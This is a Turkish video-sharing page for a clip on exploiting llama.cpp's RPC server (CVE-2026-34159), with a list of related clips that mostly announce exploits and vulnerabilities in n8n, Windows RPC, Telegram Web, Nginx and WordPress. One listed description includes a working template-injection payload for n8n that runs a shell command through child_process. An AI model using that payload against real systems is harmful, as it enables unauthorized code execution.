Video yükleniyor...

Video Yüklenemedi

Ana Sayfaya Dön

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

NullSecurityX's profile picture

NullSecurityX

11,808 subscribers

19,539 görüntüleme • 1 ay önce •via X (Twitter)

LIVE

Anya Rossi• Live Now

Private livecam show

0 Yorum

Yorum bulunmuyor

Orijinal gönderinin yorumları burada görünecek

Benzer Videolar

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}
1:23

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}

NullSecurityX

36,718 görüntüleme • 2 ay önce

So here is new local privilege escalation zero-day I discovered, not patched yet too :). In simple terms, if you have a service like RDP that exposes an RPC server, there many system services running as SYSTEM connect to it as RPC clients. If that service is turned off (RDP is off by default), it seems that any other process in Windows can expose the same RPC server using the same endpoint. Now all the RPC calls from that SYSTEM processes will come to this fake server and If the process that deployed the server has SeImpersonatePrivilege, it can escalate to SYSTEM by impersonate the RPC client. In the white paper below, I describe five exploit paths you can abuse. However it's architecture problem and maybe there are more. It's Not A Potato
1:49

So here is new local privilege escalation zero-day I discovered, not patched yet too :). In simple terms, if you have a service like RDP that exposes an RPC server, there many system services running as SYSTEM connect to it as RPC clients. If that service is turned off (RDP is off by default), it seems that any other process in Windows can expose the same RPC server using the same endpoint. Now all the RPC calls from that SYSTEM processes will come to this fake server and If the process that deployed the server has SeImpersonatePrivilege, it can escalate to SYSTEM by impersonate the RPC client. In the white paper below, I describe five exploit paths you can abuse. However it's architecture problem and maybe there are more. It's Not A Potato

Haidar

50,580 görüntüleme • 1 ay önce

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)
0:31

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

NullSecurityX

93,653 görüntüleme • 2 ay önce

It's the bug of the month for June 2026! CVE-2026-45657 - A CVSS 9.8 vulnerability in Kernel that allows remote, unauthenticated code execution at SYSTEM without user interaction. Yikes!
0:38

It's the bug of the month for June 2026! CVE-2026-45657 - A CVSS 9.8 vulnerability in Kernel that allows remote, unauthenticated code execution at SYSTEM without user interaction. Yikes!

TrendAI Zero Day Initiative

31,362 görüntüleme • 6 gün önce

If you want to be able to call server functions from the client, RPC is often the move. The Bun + Better Call combo gets you a fullstack solution in very little code. Server, Client, bundling and HMR 👌 had to record a little video showing the setup
3:26

If you want to be able to call server functions from the client, RPC is often the move. The Bun + Better Call combo gets you a fullstack solution in very little code. Server, Client, bundling and HMR 👌 had to record a little video showing the setup

Wes Bos

103,552 görüntüleme • 7 ay önce

CVE 2020-14882: WebLogic Server Unauthenticated RCE via GET request Credit:
0:36

CVE 2020-14882: WebLogic Server Unauthenticated RCE via GET request Credit:

Dark Web Informer - Cyber Threat Intelligence

13,926 görüntüleme • 1 yıl önce

🔥MAJOR MILESTONE: PI NETWORK ACTIVATES TESTNET RPC SERVER FOR SMART CONTRACTS Pi Network (Pi Network) has officially launched an RPC server on its Testnet, marking a major milestone toward full programmability. This infrastructure allows developers to simulate, test, and deploy smart contracts within the Pi ecosystem for the first time. This technical update signals a shift from a closed mobile community toward a functional, utility-driven Layer 1 network.
0:30

🔥MAJOR MILESTONE: PI NETWORK ACTIVATES TESTNET RPC SERVER FOR SMART CONTRACTS Pi Network (Pi Network) has officially launched an RPC server on its Testnet, marking a major milestone toward full programmability. This infrastructure allows developers to simulate, test, and deploy smart contracts within the Pi ecosystem for the first time. This technical update signals a shift from a closed mobile community toward a functional, utility-driven Layer 1 network.

BSCN

22,919 görüntüleme • 2 ay önce

⚠️ We’ve reproduced CVE-2025-49113 in Roundcube. This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization. If you're running Roundcube — update immediately!
0:29

⚠️ We’ve reproduced CVE-2025-49113 in Roundcube. This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization. If you're running Roundcube — update immediately!

PT SWARM

49,934 görüntüleme • 1 yıl önce

CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability Check out the new security vulnerability I discovered in Windows, which I believe is potentially being sold in the wild. (fixed patch tuesday) Blog post: PoC:
0:46

CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability Check out the new security vulnerability I discovered in Windows, which I believe is potentially being sold in the wild. (fixed patch tuesday) Blog post: PoC:

0x6rss

45,616 görüntüleme • 1 yıl önce

CVE-2023-23397 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability. Details: #infosec #CyberSecurity #Pentesting #redteam
0:56

CVE-2023-23397 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability. Details: #infosec #CyberSecurity #Pentesting #redteam

HackGit

39,726 görüntüleme • 3 yıl önce

Say hello to Eternal Tux🐧, a 0-click RCE exploit against the Linux kernel from KSMBD N-Days (CVE-2023-52440 & CVE-2023-4130) Cheers to Pumpkin 🎃 for finding these CVEs + the OffensiveCon talk from gteissier & Quentin Minster Picavet for inspiration!
1:13

Say hello to Eternal Tux🐧, a 0-click RCE exploit against the Linux kernel from KSMBD N-Days (CVE-2023-52440 & CVE-2023-4130) Cheers to Pumpkin 🎃 for finding these CVEs + the OffensiveCon talk from gteissier & Quentin Minster Picavet for inspiration!

Crusaders of Rust

81,655 görüntüleme • 9 ay önce

CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server Don’t use and never use this vulnerability lightly,because it is a master of data cleaning
1:13

CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server Don’t use and never use this vulnerability lightly,because it is a master of data cleaning

ShimizuKawasaki

97,359 görüntüleme • 2 yıl önce

‼️ CVE-2026-22812: OpenCode v1.0.216 - Unauthenticated RCE CVSS: 8.8 CVE Published: January 12th, 2026 PoC/Exploit: Advisory/PoC: Original Post:
3:47

‼️ CVE-2026-22812: OpenCode v1.0.216 - Unauthenticated RCE CVSS: 8.8 CVE Published: January 12th, 2026 PoC/Exploit: Advisory/PoC: Original Post:

Dark Web Informer

28,847 görüntüleme • 4 ay önce

Every 3rd website you visit runs Nginx. 18,959,833 of them can be hijacked right now. A bug from 2008 just got a working exploit. CVE-2026-42945 (CVSS 9.2) No login. No access. Just one HTTP request. → Heap overflow → Worker process → RCE Patch ASAP to Nginx 1.31.0 or 1.30.1 PoC is already out:
0:36

Every 3rd website you visit runs Nginx. 18,959,833 of them can be hijacked right now. A bug from 2008 just got a working exploit. CVE-2026-42945 (CVSS 9.2) No login. No access. Just one HTTP request. → Heap overflow → Worker process → RCE Patch ASAP to Nginx 1.31.0 or 1.30.1 PoC is already out:

Het Mehta

151,848 görüntüleme • 1 ay önce

🚨POC RELEASED🚨PoC for SQL Injection leads to RCE in Wordpress released (CVE-2024-27956). #Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Wordpress #Infosec #CTI #CVE202427956 #Vulnerability
1:06

🚨POC RELEASED🚨PoC for SQL Injection leads to RCE in Wordpress released (CVE-2024-27956). #Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Wordpress #Infosec #CTI #CVE202427956 #Vulnerability

Dark Web Informer

51,367 görüntüleme • 2 yıl önce

The first hidden-service RPC on the Anyone Network. See this complete demo of using a fully anonymous RPC with the Rabby Wallet wallet on Sepolia. Your IP, location and metadata are masked by an Anyone circuit, while the RPC host itself is undetectable. Complete freedom and censorship resistance for Ethereum transactions. Protected by Anyone.
0:34

The first hidden-service RPC on the Anyone Network. See this complete demo of using a fully anonymous RPC with the Rabby Wallet wallet on Sepolia. Your IP, location and metadata are masked by an Anyone circuit, while the RPC host itself is undetectable. Complete freedom and censorship resistance for Ethereum transactions. Protected by Anyone.

ANyONe Protocol

127,897 görüntüleme • 7 ay önce

Monad is fast. Monad with shMonad RPC is really fast. Now, you can experience even more speed on Monad with MetaMask. Follow our tutorial to set up shMonad RPC in your MetaMask wallet:
3:52

Monad is fast. Monad with shMonad RPC is really fast. Now, you can experience even more speed on Monad with MetaMask. Follow our tutorial to set up shMonad RPC in your MetaMask wallet:

FastLane Labs

17,041 görüntüleme • 11 ay önce

"A Vulnerability to Hack The World" - CVE-2023-4863 The start of a mini series digging into the recent WebP vulnerability. In this first episode, we explore huffman tables!
17:59

"A Vulnerability to Hack The World" - CVE-2023-4863 The start of a mini series digging into the recent WebP vulnerability. In this first episode, we explore huffman tables!

LiveOverflow 🔴

44,787 görüntüleme • 2 yıl önce

Rce -> uaf 26.4 down better variant of cve-2026-20637 unpatched
0:42

Rce -> uaf 26.4 down better variant of cve-2026-20637 unpatched

zip

19,034 görüntüleme • 1 ay önce

Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough? As you might have guessed, the answer is not so much. We chained six unique CVEs from 2023 listed below. • Chrome Renderer RCE : CVE-2023-3079 • Chrome Sandbox Escape : CVE-2023-21674 • LPE in guest OS : CVE-2023-29360 • VMware Info Leak : CVE-2023-34044 • VMware Escape : CVE-2023-20869 • LPE in host OS : CVE-2023-36802
0:34

Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough? As you might have guessed, the answer is not so much. We chained six unique CVEs from 2023 listed below. • Chrome Renderer RCE : CVE-2023-3079 • Chrome Sandbox Escape : CVE-2023-21674 • LPE in guest OS : CVE-2023-29360 • VMware Info Leak : CVE-2023-34044 • VMware Escape : CVE-2023-20869 • LPE in host OS : CVE-2023-36802

Theori

139,539 görüntüleme • 2 yıl önce